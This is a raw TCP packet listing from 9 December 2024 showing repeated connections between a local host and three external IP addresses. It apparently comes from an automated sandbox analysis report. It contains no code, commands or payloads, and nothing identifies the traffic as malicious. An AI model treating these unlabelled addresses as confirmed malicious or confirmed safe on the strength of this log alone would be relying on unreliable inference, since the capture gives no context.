                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.264650106 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.264695883 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.264780045 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.264813900 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.265726089 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.265775919 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.265857935 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.265898943 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.266846895 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.266895056 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.267013073 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.267054081 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.267882109 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.267925024 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.267993927 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.268040895 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.269012928 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.269054890 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.269118071 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.269160032 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.405313969 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.405400991 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.405421972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.405459881 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.405819893 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.405864954 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.405935049 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.405978918 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.406871080 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.406935930 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.406968117 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.407010078 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.407994032 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.408035994 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.408142090 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.408185959 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.409080982 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.409123898 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.409205914 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.409251928 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.410156012 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.410197973 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.410270929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.410314083 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.411720037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.411757946 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.411881924 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.411927938 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.412338972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.412383080 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.412566900 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.412611008 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.413465977 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.413511038 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.413610935 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.413654089 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.414474010 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.414516926 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.414554119 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.414596081 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:12.270268917 CET49867443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:12.270292997 CET44349867172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:12.270356894 CET49867443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:12.273401976 CET49867443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:12.273421049 CET44349867172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.494678974 CET44349867172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.494827032 CET49867443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.496443987 CET49867443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.496452093 CET44349867172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.496711969 CET44349867172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.543504000 CET49867443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.544904947 CET49867443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.544934034 CET49867443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.544996977 CET44349867172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.606786966 CET4985480192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.607101917 CET4986880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.726453066 CET8049868185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.726516962 CET8049854185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.726679087 CET4985480192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.726680994 CET4986880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.726845026 CET4986880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.846195936 CET8049868185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:14.202681065 CET44349867172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:14.202775002 CET44349867172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:14.202827930 CET49867443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:14.204663038 CET49867443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:14.204675913 CET44349867172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:14.254405022 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:14.254422903 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:14.254487038 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:14.254817009 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:14.254827023 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.076961994 CET8049868185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.077060938 CET4986880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.177334070 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.177695990 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.297094107 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.297138929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.297169924 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.297197104 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.297434092 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.416625977 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.473200083 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.473267078 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.474750042 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.474756956 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.474997044 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.476412058 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.476471901 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.476495981 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.213033915 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.213097095 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.213143110 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.213176012 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.213203907 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.213221073 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.213248968 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.215747118 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.215874910 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.215922117 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.215931892 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.215984106 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.224222898 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.232583046 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.232644081 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.232652903 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.277986050 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.337275982 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.389707088 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.405076027 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.408849001 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.408881903 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.408889055 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.408898115 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.408981085 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.409030914 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.409173965 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.409182072 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.409213066 CET49873443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.409218073 CET44349873172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.546993017 CET49879443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.547019958 CET44349879172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.547122002 CET49879443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.547411919 CET49879443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.547425985 CET44349879172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.795213938 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.795227051 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.795295954 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.795988083 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796032906 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796077013 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796087980 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796108961 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796123981 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796125889 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796134949 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796139002 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796153069 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796168089 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796174049 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796199083 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796222925 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.902034044 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.902134895 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.914647102 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.914705038 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.914756060 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.914798975 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.918787003 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.918833971 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.918853045 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.918895006 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.927136898 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.927195072 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.927346945 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.927392006 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.935591936 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.935672998 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.935914993 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.935960054 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.943955898 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.944006920 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.944067955 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.944108963 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.952330112 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.952382088 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.952411890 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.952449083 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.960665941 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.960675955 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.960719109 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.968945026 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.968993902 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.969027996 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.969069958 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.977318048 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.977368116 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.977440119 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.977485895 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.021686077 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.021759033 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.034137964 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.034199953 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.036185026 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.036233902 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.036283016 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.036329031 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.044584036 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.044642925 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.044687033 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.044734001 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.052930117 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.052989006 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.053014994 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.053059101 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.061290979 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.061333895 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.061342955 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.061373949 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.069602013 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.069653988 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.069717884 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.069761992 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.078080893 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.078144073 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.078247070 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.078293085 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.086332083 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.086391926 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.086509943 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.086555004 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.094705105 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.094748020 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.094762087 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.094791889 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.103081942 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.103132010 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.103159904 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.103198051 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.111479044 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.111541986 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.111550093 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.111584902 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.119803905 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.119847059 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.119856119 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.119884014 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.141149998 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.141239882 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.141273975 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.141320944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.153541088 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.153620958 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.153645039 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.153697014 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.155740976 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.155801058 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.155838966 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.155878067 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.160245895 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.160310984 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.160337925 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.160389900 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.164422989 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.164434910 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.164474010 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.168782949 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.168889999 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.168972969 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.169024944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.172944069 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.172992945 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.173120022 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.173162937 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.177228928 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.177278042 CET4987480192.168.2.631.41.244.11
